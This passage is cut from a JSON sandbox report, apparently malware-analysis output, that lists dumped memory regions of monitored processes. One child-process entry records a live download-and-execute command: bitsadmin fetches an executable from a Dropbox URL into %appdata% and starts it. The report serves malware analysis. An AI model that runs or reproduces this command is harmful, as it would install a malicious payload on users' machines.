"writable" ], "ref_process_dump": { "ref_id": "proc_dump_147", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 216793088, "type": "region", "version": 1 }, "end_va": 217841663, "entry_point": 0, "filename": null, "id": "region_508", "name": "private_0x000000000cec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 216793088, "timestamp": "00:00:17.320", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000509-addr_0x000007fffff74000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_148", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092448768, "type": "region", "version": 1 }, "end_va": 8796092456959, "entry_point": 0, "filename": null, "id": "region_509", "name": "private_0x000007fffff74000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092448768, "timestamp": "00:00:17.321", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000510-addr_0x0000000006cb0000-size_0x0000000000011000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_149", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 69632, "start_va": 113967104, "type": "region", "version": 1 }, "end_va": 114036735, "entry_point": 0, "filename": null, "id": "region_510", "name": "private_0x0000000006cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 113967104, "timestamp": "00:00:17.346", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000512-addr_0x0000000006cd0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_150", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 114098176, "type": "region", "version": 1 }, "end_va": 114102271, "entry_point": 0, "filename": null, "id": "region_512", "name": "private_0x0000000006cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 114098176, "timestamp": "00:00:17.351", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000513-addr_0x0000000009ac0000-size_0x0000000000011000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_151", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 69632, "start_va": 162267136, "type": "region", "version": 1 }, "end_va": 162336767, "entry_point": 0, "filename": null, "id": "region_513", "name": "private_0x0000000009ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 162267136, "timestamp": "00:00:17.353", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000514-addr_0x0000000009ac0000-size_0x000000000005b000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_152", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 372736, "start_va": 162267136, "type": "region", "version": 1 }, "end_va": 162639871, "entry_point": 0, "filename": null, "id": "region_514", "name": "private_0x0000000009ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 162267136, "timestamp": "00:00:17.383", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000516-addr_0x0000000009fa0000-size_0x000000000005b000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_153", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 372736, "start_va": 167378944, "type": "region", "version": 1 }, "end_va": 167751679, "entry_point": 0, "filename": null, "id": "region_516", "name": "private_0x0000000009fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 167378944, "timestamp": "00:00:17.387", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000523-addr_0x0000000009fa0000-size_0x000000000005b000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_155", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 372736, "start_va": 167378944, "type": "region", "version": 1 }, "end_va": 167751679, "entry_point": 0, "filename": null, "id": "region_523", "name": "private_0x0000000009fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 167378944, "timestamp": "00:00:17.435", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000602-addr_0x0000000009ae0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_170", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 162398208, "type": "region", "version": 1 }, "end_va": 162406399, "entry_point": 0, "filename": null, "id": "region_602", "name": "private_0x0000000009ae0000", "norm_filename": null, "region_type": "private_memory", "start_va": 162398208, "timestamp": "00:00:20.472", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000603-addr_0x0000000009b00000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_171", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 162529280, "type": "region", "version": 1 }, "end_va": 162537471, "entry_point": 0, "filename": null, "id": "region_603", "name": "private_0x0000000009b00000", "norm_filename": null, "region_type": "private_memory", "start_va": 162529280, "timestamp": "00:00:20.472", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000604-addr_0x0000000009b20000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_172", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 162660352, "type": "region", "version": 1 }, "end_va": 162668543, "entry_point": 0, "filename": null, "id": "region_604", "name": "private_0x0000000009b20000", "norm_filename": null, "region_type": "private_memory", "start_va": 162660352, "timestamp": "00:00:20.472", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000605-addr_0x0000000009fa0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_173", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 167378944, "type": "region", "version": 1 }, "end_va": 167387135, "entry_point": 0, "filename": null, "id": "region_605", "name": "private_0x0000000009fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 167378944, "timestamp": "00:00:20.473", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000606-addr_0x0000000009fc0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_174", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 167510016, "type": "region", "version": 1 }, "end_va": 167518207, "entry_point": 0, "filename": null, "id": "region_606", "name": "private_0x0000000009fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 167510016, "timestamp": "00:00:20.473", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000608-addr_0x000000000a000000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_175", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 167772160, "type": "region", "version": 1 }, "end_va": 167780351, "entry_point": 0, "filename": null, "id": "region_608", "name": "private_0x000000000a000000", "norm_filename": null, "region_type": "private_memory", "start_va": 167772160, "timestamp": "00:00:20.474", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000609-addr_0x000000000a370000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_176", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 171376640, "type": "region", "version": 1 }, "end_va": 171384831, "entry_point": 0, "filename": null, "id": "region_609", "name": "private_0x000000000a370000", "norm_filename": null, "region_type": "private_memory", "start_va": 171376640, "timestamp": "00:00:20.474", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000612-addr_0x000000000ab90000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_177", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 179896320, "type": "region", "version": 1 }, "end_va": 179904511, "entry_point": 0, "filename": null, "id": "region_612", "name": "private_0x000000000ab90000", "norm_filename": null, "region_type": "private_memory", "start_va": 179896320, "timestamp": "00:00:20.476", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000613-addr_0x000000000abb0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_178", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 180027392, "type": "region", "version": 1 }, "end_va": 180035583, "entry_point": 0, "filename": null, "id": "region_613", "name": "private_0x000000000abb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 180027392, "timestamp": "00:00:20.477", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000992-addr_0x0000000004100000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_241", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 68157440, "type": "region", "version": 1 }, "end_va": 68165631, "entry_point": 0, "filename": null, "id": "region_992", "name": "private_0x0000000004100000", "norm_filename": null, "region_type": "private_memory", "start_va": 68157440, "timestamp": "00:00:41.563", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000993-addr_0x0000000004120000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_242", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 68288512, "type": "region", "version": 1 }, "end_va": 68296703, "entry_point": 0, "filename": null, "id": "region_993", "name": "private_0x0000000004120000", "norm_filename": null, "region_type": "private_memory", "start_va": 68288512, "timestamp": "00:00:41.563", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000994-addr_0x00000000042c0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_243", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 69992448, "type": "region", "version": 1 }, "end_va": 70000639, "entry_point": 0, "filename": null, "id": "region_994", "name": "private_0x00000000042c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 69992448, "timestamp": "00:00:41.564", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000995-addr_0x0000000004320000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_244", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 70385664, "type": "region", "version": 1 }, "end_va": 70393855, "entry_point": 0, "filename": null, "id": "region_995", "name": "private_0x0000000004320000", "norm_filename": null, "region_type": "private_memory", "start_va": 70385664, "timestamp": "00:00:41.564", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000996-addr_0x0000000004360000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_245", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 70647808, "type": "region", "version": 1 }, "end_va": 70655999, "entry_point": 0, "filename": null, "id": "region_996", "name": "private_0x0000000004360000", "norm_filename": null, "region_type": "private_memory", "start_va": 70647808, "timestamp": "00:00:41.564", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000997-addr_0x00000000043a0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_246", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 70909952, "type": "region", "version": 1 }, "end_va": 70918143, "entry_point": 0, "filename": null, "id": "region_997", "name": "private_0x00000000043a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 70909952, "timestamp": "00:00:41.565", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000998-addr_0x00000000044f0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_247", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 72286208, "type": "region", "version": 1 }, "end_va": 72294399, "entry_point": 0, "filename": null, "id": "region_998", "name": "private_0x00000000044f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 72286208, "timestamp": "00:00:41.565", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001000-addr_0x0000000004da0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_248", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 81395712, "type": "region", "version": 1 }, "end_va": 81403903, "entry_point": 0, "filename": null, "id": "region_1000", "name": "private_0x0000000004da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81395712, "timestamp": "00:00:41.566", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001001-addr_0x0000000004dc0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_249", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 81526784, "type": "region", "version": 1 }, "end_va": 81534975, "entry_point": 0, "filename": null, "id": "region_1001", "name": "private_0x0000000004dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81526784, "timestamp": "00:00:41.566", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001055-addr_0x0000000002ea0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_275", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 48889856, "type": "region", "version": 1 }, "end_va": 48955391, "entry_point": 0, "filename": null, "id": "region_1055", "name": "private_0x0000000002ea0000", "norm_filename": null, "region_type": "private_memory", "start_va": 48889856, "timestamp": "00:01:12.389", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001062-addr_0x0000000004390000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_276", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 70844416, "type": "region", "version": 1 }, "end_va": 70852607, "entry_point": 0, "filename": null, "id": "region_1062", "name": "private_0x0000000004390000", "norm_filename": null, "region_type": "private_memory", "start_va": 70844416, "timestamp": "00:01:12.391", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001064-addr_0x0000000004510000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_277", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 72417280, "type": "region", "version": 1 }, "end_va": 72425471, "entry_point": 0, "filename": null, "id": "region_1064", "name": "private_0x0000000004510000", "norm_filename": null, "region_type": "private_memory", "start_va": 72417280, "timestamp": "00:01:12.392", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001065-addr_0x0000000005050000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_278", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 84213760, "type": "region", "version": 1 }, "end_va": 84221951, "entry_point": 0, "filename": null, "id": "region_1065", "name": "private_0x0000000005050000", "norm_filename": null, "region_type": "private_memory", "start_va": 84213760, "timestamp": "00:01:12.392", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001066-addr_0x0000000005090000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_279", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 84475904, "type": "region", "version": 1 }, "end_va": 84484095, "entry_point": 0, "filename": null, "id": "region_1066", "name": "private_0x0000000005090000", "norm_filename": null, "region_type": "private_memory", "start_va": 84475904, "timestamp": "00:01:12.392", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001067-addr_0x00000000050c0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_280", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 84672512, "type": "region", "version": 1 }, "end_va": 84680703, "entry_point": 0, "filename": null, "id": "region_1067", "name": "private_0x00000000050c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 84672512, "timestamp": "00:01:12.393", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001068-addr_0x00000000050f0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_281", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 84869120, "type": "region", "version": 1 }, "end_va": 84877311, "entry_point": 0, "filename": null, "id": "region_1068", "name": "private_0x00000000050f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 84869120, "timestamp": "00:01:12.393", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001069-addr_0x0000000005120000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_282", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 85065728, "type": "region", "version": 1 }, "end_va": 85073919, "entry_point": 0, "filename": null, "id": "region_1069", "name": "private_0x0000000005120000", "norm_filename": null, "region_type": "private_memory", "start_va": 85065728, "timestamp": "00:01:12.393", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001070-addr_0x0000000005150000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_283", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 85262336, "type": "region", "version": 1 }, "end_va": 85270527, "entry_point": 0, "filename": null, "id": "region_1070", "name": "private_0x0000000005150000", "norm_filename": null, "region_type": "private_memory", "start_va": 85262336, "timestamp": "00:01:12.394", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001109-addr_0x0000000004e60000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_284", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 82182144, "type": "region", "version": 1 }, "end_va": 82190335, "entry_point": 0, "filename": null, "id": "region_1109", "name": "private_0x0000000004e60000", "norm_filename": null, "region_type": "private_memory", "start_va": 82182144, "timestamp": "00:01:15.770", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001110-addr_0x0000000005060000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_285", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 84279296, "type": "region", "version": 1 }, "end_va": 84287487, "entry_point": 0, "filename": null, "id": "region_1110", "name": "private_0x0000000005060000", "norm_filename": null, "region_type": "private_memory", "start_va": 84279296, "timestamp": "00:01:15.770", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001111-addr_0x00000000050a0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_286", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 84541440, "type": "region", "version": 1 }, "end_va": 84549631, "entry_point": 0, "filename": null, "id": "region_1111", "name": "private_0x00000000050a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 84541440, "timestamp": "00:01:15.771", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001112-addr_0x00000000050d0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_287", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 84738048, "type": "region", "version": 1 }, "end_va": 84746239, "entry_point": 0, "filename": null, "id": "region_1112", "name": "private_0x00000000050d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 84738048, "timestamp": "00:01:15.771", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001113-addr_0x0000000005100000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_288", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 84934656, "type": "region", "version": 1 }, "end_va": 84942847, "entry_point": 0, "filename": null, "id": "region_1113", "name": "private_0x0000000005100000", "norm_filename": null, "region_type": "private_memory", "start_va": 84934656, "timestamp": "00:01:15.772", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001114-addr_0x0000000005130000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_289", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 85131264, "type": "region", "version": 1 }, "end_va": 85139455, "entry_point": 0, "filename": null, "id": "region_1114", "name": "private_0x0000000005130000", "norm_filename": null, "region_type": "private_memory", "start_va": 85131264, "timestamp": "00:01:15.772", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001115-addr_0x0000000005160000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_290", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 85327872, "type": "region", "version": 1 }, "end_va": 85336063, "entry_point": 0, "filename": null, "id": "region_1115", "name": "private_0x0000000005160000", "norm_filename": null, "region_type": "private_memory", "start_va": 85327872, "timestamp": "00:01:15.773", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001116-addr_0x00000000051c0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_291", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 85721088, "type": "region", "version": 1 }, "end_va": 85729279, "entry_point": 0, "filename": null, "id": "region_1116", "name": "private_0x00000000051c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 85721088, "timestamp": "00:01:15.773", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001117-addr_0x00000000051e0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_292", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 85852160, "type": "region", "version": 1 }, "end_va": 85860351, "entry_point": 0, "filename": null, "id": "region_1117", "name": "private_0x00000000051e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 85852160, "timestamp": "00:01:15.773", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001119-addr_0x000000000f660000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_293", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 258342912, "type": "region", "version": 1 }, "end_va": 259391487, "entry_point": 0, "filename": null, "id": "region_1119", "name": "private_0x000000000f660000", "norm_filename": null, "region_type": "private_memory", "start_va": 258342912, "timestamp": "00:01:15.774", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00001134-addr_0x000007fffff7c000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_294", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092481536, "type": "region", "version": 1 }, "end_va": 8796092489727, "entry_point": 0, "filename": null, "id": "region_1134", "name": "private_0x000007fffff7c000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092481536, "timestamp": "00:01:15.778", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\\iuoldw.exe &start %appdata%\\iuoldw.exe\"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_2", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000498-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_142", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_498", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:17.172", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000499-addr_0x0000000000110000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_143", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_499", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:17.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 364544, "start_va": 1253179392, "type": "region", "version": 1 }, "end_va": 1253543935, "entry_point": 1253179392, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_500", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1253179392, "timestamp": "00:00:17.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_501", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": 